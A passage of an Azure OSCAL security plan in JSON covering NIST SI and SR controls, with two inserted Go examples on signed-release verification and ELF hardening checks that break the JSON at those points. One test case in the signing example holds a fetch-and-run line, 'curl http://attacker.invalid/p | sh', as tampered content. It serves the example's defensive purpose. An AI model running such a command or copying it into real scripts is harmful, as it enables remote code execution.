statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"2973a163-8f33-4aff-812c-284901495373","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.7","statements":[{"uuid":"7c237dae-936f-4779-9d83-1202eeed9328","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-056"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.7_smt","by-components":[{"uuid":"5233fe5f-cc51-4c52-b8fe-ac517b7c7c41","export":{"provided":[{"uuid":"4d328220-64f1-4022-b46a-6f745c6f9e67","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-056"}],"description":"Azure utilizes Azure Security Pack (AzSecPack) monitoring via Azure System Lockdown (AzSysLock) for unexpected running software - to alert on and in some cases block unsigned code from running in the environment. This is defined as any software that is not signed per the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using AppLocker and Code Integrity. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident per Azure CEN. In addition, for servers, AzSecPack alerts on critical baseline changes. 
For network devices, the Config Policy Verifier (CPV) and Config Change Reporter (CCR) alert on any changes not tied to a work ticket."}],"responsibilities":[{"uuid":"9e74eeda-4474-4f54-a822-6a1165a7b396","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-056"}],"description":"The customer is responsible for incorporating the detection of unauthorized customer-defined security-relevant changes to customer-deployed resources into the incident response capability.","provided-uuid":"4d328220-64f1-4022-b46a-6f745c6f9e67"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0aedd26f-9b4c-44fa-a261-89760bcdf444","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-7.15","statements":[{"uuid":"87548f63-6ff2-4955-a332-dafc070cb803","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-057"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-7.15_smt","by-components":[{"uuid":"5ee893da-643b-4fce-8b98-7b9ec607a442","export":{"provided":[{"uuid":"b32640c5-7055-4e0f-b56b-a554d015e149","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-057"}],"description":"The Microsoft Security Response Center monitors for the use of penetration testing tools installed within the Azure backend, as these have the potential to cause damage to the environment if used maliciously. Alerts are sent out to security teams if accounts are used maliciously. 
Refer to security controls of AU-2, SI-3, and SI-4 for further details. Azure identifies software authorized to execute within Azure via configuration baselines and configuration scripts. Both baselines and scripts are version controlled and under configuration management. Only software included in a baseline or configuration script may be installed on Azure. Azure uses Azure Security Monitoring (ASM) and SCUBA to identify unauthorized software execution and alert appropriate personnel for further review. In addition to the standard release processes as part of OneBranch processes which includes build release verification steps such as virus scanning, in accordance with Microsoft Security Program Policy (MSPP), all software installed within Azure must have a valid signature. The Azure System Lockdown (AzSysLock) team uses AzSecPack to monitor for unexpected running software. This is defined as any software that is not signed using the appropriate signing certificates. AzSysLock sends alerts for service teams that are not properly using signed code. Additionally, for services running with AzSysLock in enforcement mode, which is currently an opt-in feature of AzSecPack, the binary does not run if it is not signed. Alerts for unsigned binaries running are created to service owners as a Severity 2 incident. For services running Azure Security Pack (AzSecPack), the OS security configuration baseline is also monitored for baseline violations, which are then reported to service owners through Incident Management (IcM) and/or Service 360 (S360) depending on the severity of the violation. Near real-time alerts include alerts for audit processing failures, such as system time changes or audit policy changes. Additionally, virtual components within Azure are managed by the Fabric Controller (FC), which is the component that is used to create, monitor, restart, and destroy virtual machines. 
Overall VM and Azure Host/Native management coverage of AzSecPack is maintained by AzSecPack."}],"responsibilities":[{"uuid":"46393e34-98e2-430d-b918-45578ce9b5ed","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-057"}],"description":"The customer is responsible for implementing cryptographic mechanisms to authenticate organization-defined software or firmware components prior to installation for customer-deployed resources.","provided-uuid":"b32640c5-7055-4e0f-b56b-a554d015e149"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"cf2b5d67-f972-42fc-b57b-4316eb871af7","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-8","statements":[{"uuid":"8182f62e-bc64-42f6-8f6e-136fda265f4b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-058"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-8_smt.a","by-components":[{"uuid":"0b82b610-c3ca-4652-8aaf-ee001013e868","export":{"provided":[{"uuid":"ae0fb06e-c8ed-4b7d-a0fc-3511ef1025b1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-058"}],"description":"Currently, Azure does not host mail servers for its customers."}],"responsibilities":[{"uu
id":"955d7468-1f6e-4343-a834-7f0982d2cf51","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-058"}],"description":"The customer is responsible for employing spam protection at entry and exit points that detects and takes action on unsolicited messages. 
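The SI-7.15 customer responsibility above is to authenticate software cryptographically before it is installed, and the Azure narrative distinguishes an audit mode that only alerts on an unsigned binary from an enforcement mode that refuses to run it. The Go program below is an added example written for this page; it is not Azure, AzSecPack or AzSysLock code, and the seeds, artifact bytes and release name in it are constructed. It signs a release manifest (artifact name plus SHA-256 digest) with an Ed25519 release key, verifies the signature against a trusted key set before it trusts the digest, and then gates installation: in enforce mode an unauthenticated release is never written to the install store, in audit mode it is installed but the failure is returned for alerting.

```go
package main

import (
	"bytes"
	"crypto/ed25519"
	"crypto/sha256"
	"errors"
	"fmt"
)

// Manifest is what the release key signs: the artifact named Name has Digest.
type Manifest struct {
	Name   string
	Digest [32]byte
}

// encode is the byte string that is signed; the NUL keeps name and digest apart.
func (m Manifest) encode() []byte { return append([]byte(m.Name+"\x00"), m.Digest[:]...) }

// Release is what a node receives before deciding whether to install.
type Release struct {
	Artifact  []byte
	Manifest  Manifest
	Signature []byte
}

var (
	ErrUntrustedSignature = errors.New("manifest signature not valid under any trusted release key")
	ErrDigestMismatch     = errors.New("artifact digest does not match the signed manifest")
)

// signRelease is the build pipeline's side; it holds the private release key.
func signRelease(priv ed25519.PrivateKey, name string, artifact []byte) Release {
	m := Manifest{Name: name, Digest: sha256.Sum256(artifact)}
	return Release{Artifact: artifact, Manifest: m, Signature: ed25519.Sign(priv, m.encode())}
}

// verifyRelease authenticates a release. Signature first: until a trusted key
// has vouched for the manifest, its digest is attacker-controlled data.
func verifyRelease(trusted []ed25519.PublicKey, r Release) error {
	signed := false
	for _, pub := range trusted {
		if ed25519.Verify(pub, r.Manifest.encode(), r.Signature) {
			signed = true
			break
		}
	}
	if !signed {
		return ErrUntrustedSignature
	}
	got := sha256.Sum256(r.Artifact)
	if !bytes.Equal(got[:], r.Manifest.Digest[:]) {
		return ErrDigestMismatch
	}
	return nil
}

// install gates the install store: enforce blocks a release that fails
// verification (enforcement mode); otherwise it installs and returns the alert (audit).
func install(enforce bool, trusted []ed25519.PublicKey, r Release, store map[string][]byte) (bool, error) {
	alert := verifyRelease(trusted, r)
	if alert != nil && enforce {
		return false, alert
	}
	store[r.Manifest.Name] = r.Artifact
	return true, alert
}

// scenario runs the gate over constructed inputs with keys from fixed seeds (for
// reproducibility only): a genuine release, a tampered artifact, a forged signer.
func scenario() (installed map[string]bool, alerts map[string]error) {
	priv := ed25519.NewKeyFromSeed(bytes.Repeat([]byte{0x11}, ed25519.SeedSize))
	rogue := ed25519.NewKeyFromSeed(bytes.Repeat([]byte{0x22}, ed25519.SeedSize))
	trusted := []ed25519.PublicKey{priv.Public().(ed25519.PublicKey)}
	artifact := []byte("#!/bin/sh\necho agent v1.2\n") // constructed stand-in for a binary
	genuine := signRelease(priv, "agent", artifact)
	tampered := genuine // signature still valid, bytes on disk replaced
	tampered.Artifact = []byte("#!/bin/sh\ncurl http://attacker.invalid/p | sh\n")
	forged := signRelease(rogue, "agent", artifact) // well-formed, wrong key
	cases := map[string]struct {
		enforce bool
		rel     Release
	}{
		"genuine/enforce":  {true, genuine},
		"tampered/enforce": {true, tampered},
		"forged/enforce":   {true, forged},
		"tampered/audit":   {false, tampered},
	}
	installed, alerts = map[string]bool{}, map[string]error{}
	for name, c := range cases {
		installed[name], alerts[name] = install(c.enforce, trusted, c.rel, map[string][]byte{})
	}
	return installed, alerts
}

func main() {
	installed, alerts := scenario()
	for name := range installed {
		fmt.Printf("%-17s installed=%-5v alert=%v\n", name, installed[name], alerts[name])
	}
}
```

The order of checks is the point: a forged manifest fails on the signature before its digest is ever compared, a genuine manifest shipped with swapped artifact bytes fails on the digest, and only audit mode lets the latter onto the node, which is exactly the gap the narrative's enforcement mode closes.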
Note: this control is only applicable to the customer if customer-deployed resources include an email server.","provided-uuid":"ae0fb06e-c8ed-4b7d-a0fc-3511ef1025b1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"79332245-854f-4011-8eea-2d5e42d2e37b","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-059"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-8_smt.b","by-components":[{"uuid":"b3d93edb-5686-4c08-97fa-2994be6fd893","export":{"provided":[{"uuid":"2f759b2a-9a9e-476b-8303-56cd37a5a2cd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-059"}],"description":"Currently, Azure does not host mail servers for its customers."}],"responsibilities":[{"uuid":"e96c06d3-2b36-468e-b194-b99da5b8d571","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-059"}],"description":"The customer is responsible for updating spam protection in accordance with organization policy and procedures. 
Note: this control is only applicable to the customer if customer-deployed resources include an email server.","provided-uuid":"2f759b2a-9a9e-476b-8303-56cd37a5a2cd"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"36e31322-8969-435f-bb8a-20e27a1ecc49","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-8.2","statements":[{"uuid":"56c4f9e1-553b-443a-a9c3-af476bc29157","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-060"},{"name":"control-origination","value":"customer-provided"}],"statement-id":"si-8.2_smt","by-components":[{"uuid":"067db2d6-66e5-417e-a185-2c09e3a359a0","export":{"provided":[{"uuid":"a52436fe-6965-48f6-957a-62e5c6682716","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-060"}],"description":"Currently, Azure does not host mail servers for its customers."}],"responsibilities":[{"uuid":"adeb1c3e-bbdf-46fb-b8da-71a40762ad15","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-060"}],"description":"The customer is responsible for automatically updating spam protection. 
Note: this control is only applicable to the customer if customer-deployed resources include an email server.","provided-uuid":"a52436fe-6965-48f6-957a-62e5c6682716"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"42eeb4a4-b3a4-4944-bc08-b385cbac4804","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-10","statements":[{"uuid":"42ecf5dc-b3dd-4465-b58a-b11f0dc2d683","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-061"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-10_smt","by-components":[{"uuid":"950643ea-685e-4ed4-a33c-ded4c3785a36","export":{"provided":[{"uuid":"af141416-f56a-4aff-99de-62d0de55d026","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-061"}],"description":"Azure follows the system development methodology and security guidelines outlined in the Microsoft Security Policy, and service teams adhere to the Security Development Lifecycle (SDL) requirements described in the common Online Services Secure Coding procedure. The SDL process addresses requirements around input data validation within services. Thorough code reviews and testing are completed during the Verification Phase of the SDL prior to software being put into a production environment. 
The code reviews and testing check for a number of coding errors, including, but not limited to, SQL injection, format string vulnerabilities, XSS, integer arithmetic, command injection, and buffer overflow vulnerabilities, and ensure the services are able to handle such scenarios in a predictable manner."}],"responsibilities":[{"uuid":"cff95913-9faa-422a-b427-943eb56f5327","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-061"}],"description":"The customer is responsible for information input validation for customer-deployed resources.","provided-uuid":"af141416-f56a-4aff-99de-62d0de55d026"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"b0fa73de-2114-4e64-9327-a817cc30e976","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-11","statements":[{"uuid":"337cf64b-57c2-4f22-9b21-d8cb4656c4d6","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-062"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-11_smt.a","by-components":[{"uuid":"af6e83b6-5019-4dd7-9759-a910e242aa32","export":{"provided":[{"uuid":"7a363fad-5338-4e75-a0a1-5cf202a6edbe","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-062"}],"description":"As part of the Security Development Lifecycle (SDL) process, service teams ensure that error messages do not contain sensitive information such as username and password combinations, attributes used to validate a password reset 
request, personally identifiable information excluding unique username identifiers provided as a normal part of a transactional record, biometric data or personal characteristics used to authenticate identity, sensitive financial records such as account numbers or access codes, content related to internal security functions such as private encryption keys, allow list or block list rules, or object permission attributes and settings. Error messages are generic in nature and provide only the limited information needed to help the user correct the error. An example is \"the username or password is incorrect\" when there is an error logging into the application."}],"responsibilities":[{"uuid":"e0dc18f2-53dc-43ad-96b4-106202cae2ea","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-062"}],"description":"The customer is responsible for generating error messages that provide the information necessary for corrective actions without revealing information that could be exploited by adversaries, for customer-deployed resources.","provided-uuid":"7a363fad-5338-4e75-a0a1-5cf202a6edbe"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"f43f63cd-ffbd-422f-b73f-71b566bee5bd","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-063"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-11_smt.b","by-components":[{"uuid":"b991043c-f2ab-46c9-9acf-ac90ff22750c","export":{"provided":[{"uuid":"508ae2a6-a0db-416e-8daf-042931486202","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-063"}],"description":"Except for error messages displayed 
to unauthenticated users, such as a login failure notification, error messages are shown only to authorized users and communicated within Azure only; they are not accessible to external parties."}],"responsibilities":[{"uuid":"06d96da2-9aaf-4ea9-b72d-559e5eeccdec","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-063"}],"description":"The customer is responsible for revealing the error messages defined in SI-11.a to only customer-defined personnel or roles.","provided-uuid":"508ae2a6-a0db-416e-8daf-042931486202"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"0b8f9d36-7453-48ce-b6e5-c83f0de8b7a3","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-12","statements":[{"uuid":"c468a72c-c3c5-4a59-9acd-862d652d1f03","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-064"},{"name":"control-origination","value":"organization"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-12_smt","by-components":[{"uuid":"f5c103d5-9a63-4a2d-877d-ae8fc0938f08","export":{"provided":[{"uuid":"c77cb4da-6e51-4a58-9d0a-5314cae5f6c1","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-064"}],"description":"Azure assets are retained as appropriate based on retention requirements set by Corporate Records Management and an asset's classification or based on contractual requirements. 
The Microsoft Asset Classification Standard, Data Classification Standard, and Asset Protection Standard describe the minimum security requirements that Azure personnel must apply to information assets based on their classification, including Low Value Asset (LVA), Moderate Value Asset (MVA), and High Value Asset (HVA). The Corporate Document Retention Schedule describes which Microsoft documents must be kept and for how long. Microsoft guarantees retention of customer data for thirty (30) days after termination. All information is permanently deleted ninety (90) days after termination of service. All Azure personnel responsible for managing and maintaining Azure assets ensure that assets are handled securely and provided with an appropriate level of protection in accordance with the Asset Classification Standard, Data Classification Standard, and Asset Protection Standard. Microsoft assets are handled and retained in the following manner:\n* Information system documentation is accessible to Microsoft personnel via internal SharePoint sites. Individual service teams utilizing SharePoint are responsible for managing access to their own sites.\n* Operations assets are retained as appropriate based on retention requirements set by Corporate Records Management and the asset's classification as documented within the Asset Classification Standard and Asset Protection Standard. 
* Operations assets are disposed of in accordance with the asset's retention requirements as set by Corporate Records Management."}],"responsibilities":[{"uuid":"bffdf7b4-4bc5-44f7-a675-d72eaaec427e","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-064"}],"description":"For customers of IaaS and PaaS services, the customer is responsible for managing and retaining information within customer-deployed resources and information output from those resources in accordance with applicable federal laws, Executive Orders, directives, policies, regulations, standards, and operational requirements.","provided-uuid":"c77cb4da-6e51-4a58-9d0a-5314cae5f6c1"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"c52a0902-64ea-4953-a101-cbd1ff3c5369","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"si-16","statements":[{"uuid":"1e9f14f0-7424-4e15-b4cb-55a8721dcae0","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-065"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"si-16_smt","by-components":[{"uuid":"2ac7481d-9061-4509-848d-073ac80b2792","export":{"provided":[{"uuid":"8d94a71d-bcd2-4ac2-b969-0614146dba18","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-065"}],"description":"Azure uses Windows and Linux operating systems for its services. 
Both operating systems have protections in place against code execution in restricted memory locations: hardware No Execute (NX) page protection, enforced on Windows as Data Execution Prevention (DEP), together with Address Space Layout Randomization (ASLR), which makes the addresses of code and data unpredictable to an attacker. Additionally, the Security Development Lifecycle (SDL) requires secure coding practices including explicit consideration of safe memory handling requirements.\n\nSee the following TechNet articles for more information about the protections:\n\n* <https://technet.microsoft.com/en-us/library/aa366553.aspx>\n* <https://technet.microsoft.com/en-us/library/bb457155.aspx>\n* <https://technet.microsoft.com/en-us/library/cc771361%28v=WS.10%29.aspx>\n* <https://wiki.ubuntu.com/Security/Features#nx>"}],"responsibilities":[{"uuid":"3f2b594e-81ba-4137-ad7a-d147cad5c6d9","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SI-17-065"}],"description":"The customer is responsible for protecting customer-deployed resources from unauthorized code execution.","provided-uuid":"8d94a71d-bcd2-4ac2-b969-0614146dba18"}]},"description":"See inheritance and customer responsibility 
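SI-16 above names NX/DEP and ASLR as the operating-system protections and leaves the customer responsible for the binaries they deploy. Those protections only help a process whose executable opts into them, and on Linux the opt-in is visible in the ELF program headers: a PT_GNU_STACK segment without PF_X asks the loader for a non-executable stack, an ET_DYN (position-independent) executable can be loaded at a random base, and PT_GNU_RELRO marks relocation data read-only after load. The Go program below is an added example for this page, not part of the SSP or of any Azure tooling; it constructs three minimal ELF images in memory (constructed scaffolding, not loadable programs) and reports which opt-ins each carries, which is the check a deployment pipeline would run over real binaries before they reach a VM. The Windows equivalents are the DEP and dynamic-base flags in the PE optional header; they are not covered here.

```go
package main

import (
	"bytes"
	"debug/elf"
	"encoding/binary"
	"fmt"
)

// Hardening records the loader-visible opt-ins that NX/DEP and ASLR depend on.
type Hardening struct {
	PIE   bool     // ET_DYN executable: loadable at a random base, so ASLR applies to it
	NX    bool     // PT_GNU_STACK present without PF_X: stack mapped non-executable
	Relro bool     // PT_GNU_RELRO present: relocation data made read-only after load
	Notes []string // findings a reviewer would act on; empty when nothing is wrong
}

// checkELF parses an ELF image and reports its hardening opt-ins. Only program
// headers are inspected, since that is what the kernel and loader act on.
func checkELF(raw []byte) (Hardening, error) {
	f, err := elf.NewFile(bytes.NewReader(raw))
	if err != nil {
		return Hardening{}, err
	}
	h := Hardening{PIE: f.Type == elf.ET_DYN}
	if !h.PIE {
		h.Notes = append(h.Notes, "ET_EXEC: fixed load address, main image is not randomised")
	}
	sawStack := false
	for _, p := range f.Progs {
		switch p.Type {
		case elf.PT_GNU_STACK:
			sawStack = true
			h.NX = p.Flags&elf.PF_X == 0
			if !h.NX {
				h.Notes = append(h.Notes, "PT_GNU_STACK has PF_X: executable stack requested")
			}
		case elf.PT_GNU_RELRO:
			h.Relro = true
		}
	}
	if !sawStack {
		h.Notes = append(h.Notes, "no PT_GNU_STACK: loader falls back to an executable stack on x86")
	}
	return h, nil
}

// buildELF constructs a minimal little-endian x86-64 ELF image with only the
// program headers needed here. Constructed scaffolding, not a loadable program.
func buildELF(typ elf.Type, gnuStack, stackExec, relro bool) []byte {
	var progs []elf.Prog64
	if gnuStack {
		flags := uint32(elf.PF_R | elf.PF_W)
		if stackExec {
			flags |= uint32(elf.PF_X)
		}
		progs = append(progs, elf.Prog64{Type: uint32(elf.PT_GNU_STACK), Flags: flags, Align: 16})
	}
	if relro {
		progs = append(progs, elf.Prog64{Type: uint32(elf.PT_GNU_RELRO), Flags: uint32(elf.PF_R), Align: 1})
	}
	hdr := elf.Header64{
		Type: uint16(typ), Machine: uint16(elf.EM_X86_64), Version: uint32(elf.EV_CURRENT),
		Phoff: 64, Ehsize: 64, Phentsize: 56, Phnum: uint16(len(progs)), Shentsize: 64,
	}
	// e_ident: magic, 64-bit class, little-endian data, current version; OSABI and padding zero.
	hdr.Ident = [16]byte{0x7f, 'E', 'L', 'F', byte(elf.ELFCLASS64), byte(elf.ELFDATA2LSB), byte(elf.EV_CURRENT)}
	var buf bytes.Buffer
	binary.Write(&buf, binary.LittleEndian, hdr) // writes to a bytes.Buffer do not fail
	for _, p := range progs {
		binary.Write(&buf, binary.LittleEndian, p)
	}
	return buf.Bytes()
}

// auditSamples runs checkELF over three constructed images: fully hardened,
// executable stack requested, and a legacy non-PIE image with no PT_GNU_STACK.
func auditSamples() map[string]Hardening {
	samples := map[string][]byte{
		"hardened":  buildELF(elf.ET_DYN, true, false, true),
		"execstack": buildELF(elf.ET_DYN, true, true, false),
		"legacy":    buildELF(elf.ET_EXEC, false, false, false),
	}
	out := make(map[string]Hardening, len(samples))
	for name, raw := range samples {
		h, err := checkELF(raw)
		if err != nil {
			h.Notes = append(h.Notes, "parse error: "+err.Error())
		}
		out[name] = h
	}
	return out
}

func main() {
	for name, h := range auditSamples() {
		fmt.Printf("%-10s PIE=%-5v NX=%-5v RELRO=%-5v %v\n", name, h.PIE, h.NX, h.Relro, h.Notes)
	}
}
```

Against a real binary the same checkELF call takes the file's bytes; a non-empty Notes slice is the signal to fail the deployment, since a binary that asks for an executable stack or a fixed load address has opted out of the protections the operating system narrative above relies on.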
statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]}]},{"uuid":"5f5044ea-d5eb-4f49-a30b-31608ac314bc","props":[{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"category","value":"security"},{"ns":"https://csrc.nist.gov/ns/800-53/rev5","name":"activity-type","value":"operational"}],"control-id":"sr-2","statements":[{"uuid":"9c186cef-8211-4bb2-85f2-8be12bcb0824","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-006"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2_smt.a","by-components":[{"uuid":"e716b741-06a8-4c26-9397-69b66baf16fe","export":{"provided":[{"uuid":"5ba478c3-6c68-4a47-a988-5b8a29679857","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-006"}],"description":"The Azure Supply Chain team has formulated a supply chain risk management plan document for managing supply chain risks associated with Azure cloud environments. 
The document is designed to address supply chain security and availability risks, enabling Azure to comply with contractual and regulatory commitments."}],"responsibilities":[{"uuid":"0a30a91b-ff43-4990-95a4-876ef251a53d","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-006"}],"description":"The customer is responsible for developing a plan for managing supply chain risks associated with research and development, design, manufacturing, acquisition, delivery, integration, operations and maintenance, and disposal of customer-deployed resources.","provided-uuid":"5ba478c3-6c68-4a47-a988-5b8a29679857"}]},"description":"See inheritance and customer responsibility statements.","component-uuid":"cd1570e8-b600-426d-a87a-845c47aa13a5","responsible-roles":[{"role-id":"cloud-service-provider","party-uuids":["bf0672d8-1ac0-484f-a49e-79cc6347bdb7"]},{"role-id":"customer","party-uuids":["d4ac8d4f-fa39-497e-b54b-38c22bdf2429"]}]}]},{"uuid":"d71bd9c8-3afa-4788-aa52-6ca4d6ac5351","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-007"},{"name":"control-origination","value":"system-specific"},{"name":"control-origination","value":"customer-configured"}],"statement-id":"sr-2_smt.b","by-components":[{"uuid":"6a725dfd-76b5-4da9-9bf8-cfc1069ff336","export":{"provided":[{"uuid":"7b739223-fd6f-4252-8c3e-e8c6debf9cd7","props":[{"ns":"https://azure.microsoft.com/ns/oscal","name":"acf-id","value":"SR-18-007"}],"description":"The Azure Supply Chain team works to ensure the supply chain risk management plan is reviewed and updated at least annually or when significant changes require review. 
